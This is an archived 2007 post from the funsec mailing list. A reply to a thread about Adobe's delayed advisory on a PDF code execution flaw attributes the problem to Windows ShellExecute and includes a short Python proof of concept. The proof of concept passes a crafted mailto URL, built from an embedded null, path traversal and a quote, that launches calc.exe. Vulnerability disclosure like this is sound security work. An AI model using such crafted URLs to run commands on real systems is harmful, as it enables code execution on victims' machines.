funsec mailing list archives
Re: Adobe confirms critical vulnerability after a remarkable delay
From: rms () computerbytesman com
Date: Tue, 9 Oct 2007 14:37:03 -0400 (EDT)
Hi, BTW, it is the ShellExecute Win32 function that is busted. The attached Python test program runs the Windows calculator on my system with IE7 installed. ShellExecute should either return an error or run the default email reader. This security problem will affect programs that use ShellExecute with a user supplied URL. The problem here is Windows gets confused by an embedded null and double quotes in a URL and does the wrong thing. This doesn't feel like the same bug as the IE7/Firefox problem that surfaced in July which was a problem with quoting URLs on command lines. Richard ================================================ import win32api def main(): win32api.ShellExecute(0, "open" , 'mailto:test%00../../../../windows/system32/calc.exe".cmd' , "" , "." , 0) return main() ================================================
Adobe has provided information with a workaround related to critical code execution vulnerability reported by Mr. Petko D. Petkov (aka pdp) on 20 th Sep. http://www.gnucitizen.org/blog/0day-pdf-pwns-windows That was almost three weeks ago... The following advisory title states affected Acrobat versions: Workaround available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat http://www.adobe.com/support/security/advisories/apsa07-04.html Go and backup your registry and apply these changes! Red Hat has officially informed Linux versions are not vulnerable. - Juha-Matti _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- Adobe confirms critical vulnerability after a remarkable delay Juha-Matti Laurio (Oct 09)
- Re: Adobe confirms critical vulnerability after a remarkable delay rms (Oct 09)